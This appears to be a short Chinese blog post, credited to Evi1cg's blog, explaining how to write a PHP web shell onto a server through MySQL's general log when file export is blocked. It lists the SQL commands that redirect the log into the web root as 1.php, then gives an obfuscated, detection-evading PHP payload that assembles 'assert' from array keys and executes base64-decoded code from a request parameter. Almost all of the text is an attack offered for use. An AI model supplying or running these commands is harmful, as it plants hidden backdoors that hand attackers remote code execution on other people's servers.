SQL语句利用日志写shell

outfile被禁止，或者写入文件被拦截；

在数据库中操作如下：（必须是root权限）

show variables like '%general%'; #查看配置

set global general_log = on; #开启general log模式

set global general_log_file = '/var/www/html/1.php'; #设置日志目录为shell地址

select '' #写入shell

SQL查询免杀shell的语句

SELECT "'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_='a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>"

文章出处：Evi1cg's blog

你可能喜欢